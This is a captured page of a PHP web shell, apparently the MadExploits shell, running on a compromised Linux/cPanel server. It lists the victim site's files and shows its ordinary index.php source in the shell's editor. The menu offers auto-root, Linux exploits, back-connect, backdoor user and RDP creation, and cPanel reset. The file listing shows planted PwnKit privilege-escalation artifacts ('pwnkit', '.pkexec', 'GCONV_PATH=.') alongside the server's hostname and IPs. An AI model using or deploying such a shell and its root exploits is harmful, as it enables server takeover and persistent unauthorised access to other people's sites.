Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.189.182.15
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include( "includes/header.php");?> <?php $sltbl = $tool->ed(slt, 'e'); $slider = getData($db, slt); if(isset($_SESSION['login'])){ $CountSlide = $slider->num_rows; if($CountSlide < 1) { echo '<div class="my-5 text-center"><a href="create.php?type=slider" class="btn btn-success btn-lg" title="Add New Slider"> <i class="fa fa-plus"></i> Add Slide </a></div>'; } } // $count_slide = $slider->num_rows; ?> <section class="intro_section page_mainslider ds"> <div class="flexslider"> <ul class="slides"> <?php while($slide = $slider->fetch_assoc()){ ?> <li style="position:relative;"> <?php if(isset($_SESSION['login'])){ ?> <div class="btn-group" style="position:absolute;right:0; z-index: 999;"> <a href="create.php?type=slider" class="btn btn-success btn-lg" title="Add New Slider"> <i class="fa fa-plus"></i> </a> <a href="update.php?tb=<?=$tool->ed(slt, 'e') ?>&ref=home&type=slider&id=<?=$slide['id']; ?>" class="btn btn-warning btn-lg" title="Update This Content"> <i class="fa fa-pencil"></i> </a> <a href="delete.php?type=slider&tbl=<?=$sltbl ?>&id=<?=$slide['id']; ?>" class="btn btn-danger btn-lg" title="Delete This Slider"> <i class="fa fa-trash"></i> </a> </div> <?php }?> <img src="<?=$slide['path'] ?>" alt="<?=$slide['heading']; ?>" /> <div class="container"> <div class="row"> <div class="col-sm-12 text-center"> <div class="slide_description_wrapper"> <div class="slide_description"> <div class="intro-layer" data-animation="fadeInRight"> <h3> <?=$slide['heading']; ?> </h3> </div> </div> </div> </div> </div> </div> </li> <?php } ?> </ul> </div> </section> <!-- slider end--> <section class="bg-gray p-tb40"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-push-6" style="position:relative;"> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=photo&id=<?php echo getContent($db, "b1", "r1c2")[0]; ?>" class="btn btn-warning btn-lg" style="position:absolute;right:0;top:0;" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> <img src="<?php echo baseurl.'/'.getContent($db, "b1", "r1c2")[3]; ?>" alt="<?php echo getContent($db, "b1", "r1c1")[3]; ?>" /> </div> <div class="col-md-6 col-md-pull-6"> <h2 class="section_header"> <?php echo getContent($db, "b1", "r1c1")[3]; ?> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=title&id=<?php echo getContent($db, "b1", "r1c1")[0]; ?>" class="btn btn-warning btn-lg" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> </h2> <hr class="divider_30_1"> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=content&id=<?php echo getContent($db, "b1", "r2c1")[0]; ?>" class="btn btn-warning btn-sm" style="float:left;margin-top:10px;margin-right:20px;" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> <?php echo getContent($db, "b1", "r2c1")[3]; ?> </div> </div> </div> </section> <!-- end section--> <section class="cs parallax darken_gradient page_about section_padding_top_75 columns_margin_bottom_30"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-push-6 text-center "> <h2 class="section_header"> <?php echo getContent($db, "b2", "r1c1")[3]; ?> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=title&id=<?php echo getContent($db, "b2", "r1c1")[0]; ?>" class="btn btn-warning btn-lg" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> </h2> <br> <div class="fontsize_14"> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=content&id=<?php echo getContent($db, "b2", "r2c1")[0]; ?>" class="btn btn-warning btn-sm" style="float:left;margin-top:10px;margin-right:20px;" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> <?php echo getContent($db, "b2", "r2c1")[3]; ?> </div> </div> <div class="col-md-6 col-md-pull-6 text-center bottommargin_0" style="position:relative;"> <br> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=photo&id=<?php echo getContent($db, "b2", "r1c2")[0]; ?>" class="btn btn-warning btn-lg" style="position:absolute; right: 15px;top: -100px;" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> <img src="<?php echo baseurl.'/'.getContent($db, "b2", "r1c2")[3]; ?>" alt="<?php echo getContent($db, "b2", "r1c1")[3]; ?>" alt="<?php echo getContent($db, "b2", "r1c1")[3]; ?>" class="top-overlap" /> </div> </div> </div> </section> <!-- end section--> <section class="back-w p-tb40"> <div class="container"> <div class="row"> <div class="col-sm-12 text-center"> <h2 class="section_header with_icon"> <?php echo getContent($db, "b3", "r1c1")[3]; ?> <?php if(isset($_SESSION['login'])){ ?> <div class="btn-group"> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=title&id=<?php echo getContent($db, "b3", "r1c1")[0]; ?>" class="btn btn-warning btn-lg" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> </div> <?php }?> </h2> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=home&type=content&id=<?php echo getContent($db, "b3", "r2c1")[0]; ?>" style="float:left;" class="btn btn-warning btn-sm" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> <?php echo getContent($db, "b3", "r2c1")[3]; ?> </div> </div> <div class="row columns_padding_0 columns_margin_0 fontsize_16"> <?php if(isset($_SESSION['login'])){ ?> <a href="create.php?type=services" title="Add New Service"> <div class="col-md-3 col-sm-6 pd-b-15" style="position:relative;"> <div class="with_padding text-center teaser hover_shadow"> <i class="rt-icon2-plus" style="font-size: 5.6em;"></i> <h4> Add Service </h4> <p></p> <div class="dez-post-readmore"> </div> </div> </div> </a> <?php }?> <?php $services = getData($db, st); ?> <?php while($service = $services->fetch_assoc()){ ?> <div class="col-md-3 col-sm-6 pd-b-15" style="position:relative;"> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(st, 'e') ?>&ref=services&type=services&id=<?php echo $service['id']; ?>" style="position: absolute; top:0; left:15px;z-index:999;opacity:0.8;" class="btn btn-warning btn-sm" title="Update This Content"> <i class="rt-icon2-pencil"></i> Edit </a> <a href="delete.php?type=services&tbl=<?=$tool->ed(st, 'e') ?>&id=<?php echo $service['id']; ?>&ref=<?php echo $service['service_page_name']; ?>" style="position: absolute; top:0; right:15px;z-index:999;opacity:0.8;" class="btn btn-danger btn-sm deleteServiceBtn" title="Delete This Content"> <i class="rt-icon2-trash"></i> Delete </a> <?php }?> <div class="with_padding text-center teaser hover_shadow"> <img src="<?=$service['service_sm_img'] ?>" alt="<?=$service['service_heading'] ?>"> <h4> <a href="<?=$service['service_page_name'] ?>.php"> <?=$service['service_heading'] ?></a> </h4> <p></p> <div class="dez-post-readmore"> <a href="<?=$service['service_page_name'] ?>.php" title="READ MORE" rel="bookmark">Read More <i class="fa fa-angle-double-right"></i></a> </div> </div> </div> <?php } ?> </div> </div> </section> <!-- end section--> <section class="wht p-tb40" style="display:none;"> <div class="container"> <div class="row"> <div class="col-sm-12"> <div class="col-sm-12 text-center"> <h2 class="section_header with_icon">Gallery</h2> <p></p> </div> <div class="isotope_container isotope row masonry-layout columns_margin_top_0 columns_margin_bottom_30" data-filters=".isotope_filters"> <?php $gallery = getData($db, gt); ?> <?php while($img = $gallery->fetch_assoc()){ ?> <div class="isotope-item col-lg-4 col-md-6 col-sm-12 category3"> <div class="vertical-item gallery-item content-absolute text-center ds"> <div class="item-media"> <img src="<?=baseurl.'/'.$img['path'] ?>" alt="Gallery Image"> <div class="media-links"> <div class="links-wrap"> <a class="p-view prettyPhoto " title="" data-gal="prettyPhoto[gal]" href="<?=baseurl.'/'.$img['path'] ?>"></a> </div> </div> </div> </div> </div> <?php } ?> </div> <!-- eof .isotope_container.row --> </div> </div> </div> </section> <div class="clearfix"></div> <div class="clear"></div> <!-- end section--> <?php include( "includes/subscribe.php");?> <!-- end section--> <?php include( "includes/footer.php");?>
Close